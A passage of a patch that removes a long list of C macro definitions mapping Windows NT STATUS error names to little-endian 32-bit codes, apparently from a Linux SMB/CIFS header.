+-#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
+-#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
+-#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
+-#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
+-#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
+-#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
+-#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
+-#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
+-#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
+-#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
+-#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
+-#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
+-#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
+-#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
+-#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
+-#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
+-#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
+-#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
+-#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
+-#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
+-#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
+-#define STATUS_RETRY cpu_to_le32(0xC000022D)
+-#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
+-#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
+-#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
+-#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
+-#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
+-#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
+-#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
+-#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
+-#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
+-#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
+-#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
+-#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
+-#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
+-#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
+-#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
+-#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
+-#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
+-#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
+-#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
+-#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
+-#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
+-#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
+-#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
+-#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
+-#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
+-#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
+-#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
+-#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
+-#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
+-#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
+-#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
+-#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
+-#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
+-#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
+-#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
+-#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
+-#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
+-#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
+-#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
+-#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
+-#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
+-#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
+-#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
+-#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
+-#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
+-#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
+-#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
+-#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
+-#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
+-#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
+-#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
+-#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
+-#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
+-#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
+-#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
+-#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
+-#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
+-#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
+-#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
+-#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
+-#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
+-#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
+-#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
+-#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
+-#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
+-#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
+-#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
+-#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
+-#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
+-#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
+-#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
+-#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
+-#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
+-#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
+-#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
+-#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
+-#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
+-#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
+-#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
+-#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
+-#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
+-#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
+-#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
+-#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
+-#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
+-#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
+-#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
+-#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
+-#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
+-#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
+-#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
+-#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
+-#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
+-#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
+-#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
+-#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
+-#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
+-#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
+-#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
+-#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
+-#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
+-#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
+-#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
+-#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
+-#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
+-#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
+-#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
+-#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
+-#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
+-#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
+-#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
+-#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
+-#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
+-#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
+-#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
+-#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
+-#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
+-#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
+-#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
+-#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
+-#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
+-#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
+-#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
+-#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
+-#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
+-#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
+-#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
+-#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
+-#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
+-#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
+-#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
+-#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
+-#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
+-#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
+-#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
+-#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
+-#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
+-#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
+-#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
+-#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
+-#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
+-#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
+-#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
+-#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
+-#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
+-#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
+-#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER	\
+-	cpu_to_le32(0xC00002DB)
+-#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
+-#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
+-#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
+-#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
+-#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
+-#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
+-#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
+-#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
+-#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
+-#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
+-#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
+-#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
+-#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
+-#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
+-#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
+-#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
+-#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
+-#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
+-#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
+-#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
+-#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
+-#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
+-#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
+-#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
+-#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
+-#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
+-#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
+-#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
+-#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
+-#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
+-#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
+-#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
+-#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
+-#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
+-#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
+-#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
+-#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
+-#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
+-#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
+-#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
+-#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
+-#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
+-#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
+-#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
+-#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
+-#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
+-#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
+-#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
+-#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
+-#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
+-#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
+-#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
+-#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
+-#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
+-#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
+-#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
+-#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
+-#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
+-#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
+-#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
+-#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
+-#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
+-#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
+-#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
+-#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
+-#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
+-#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
+-#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
+-#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
+-#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
+-#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
+-#define STATUS_MCA_OCCURRED cpu_to_le32(0xC000036A)
+-#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
+-#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
+-#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
+-#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
+-#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
+-#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
+-#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
+-#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
+-#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
+-#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
+-#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
+-#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
+-#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
+-#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
+-#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
+-#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
+-#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
+-#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
+-#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
+-#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
+-#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
+-#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
+-#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
+-#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
+-#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
+-#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
+-#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
+-#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
+-#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
+-#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
+-#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
+-#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
+-#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
+-#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
+-#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
+-#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
+-#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
+-#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
+-#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
+-#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
+-#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
+-#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
+-#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
+-#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
+-#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
+-#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
+-#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE	\
+-	cpu_to_le32(0xC0000416)
+-#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
+-#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
+-#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
+-#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
+-#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
+-#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
+-#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
+-#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
+-#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
+-#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
+-#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
+-#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
+-#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
+-#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
+-#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
+-#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
+-#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
+-#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
+-#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
+-#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
+-#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
+-#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
+-#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
+-#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
+-#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
+-#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
+-#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
+-#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
+-#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
+-#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
+-#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
+-#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
+-#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
+-#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
+-#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
+-#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
+-#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
+-#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
+-#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
+-#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
+-#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
+-#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
+-#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
+-#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
+-#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
+-#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070C)
+-#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070D)
+-#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED	\
+-	cpu_to_le32(0xC000070E)
+-#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
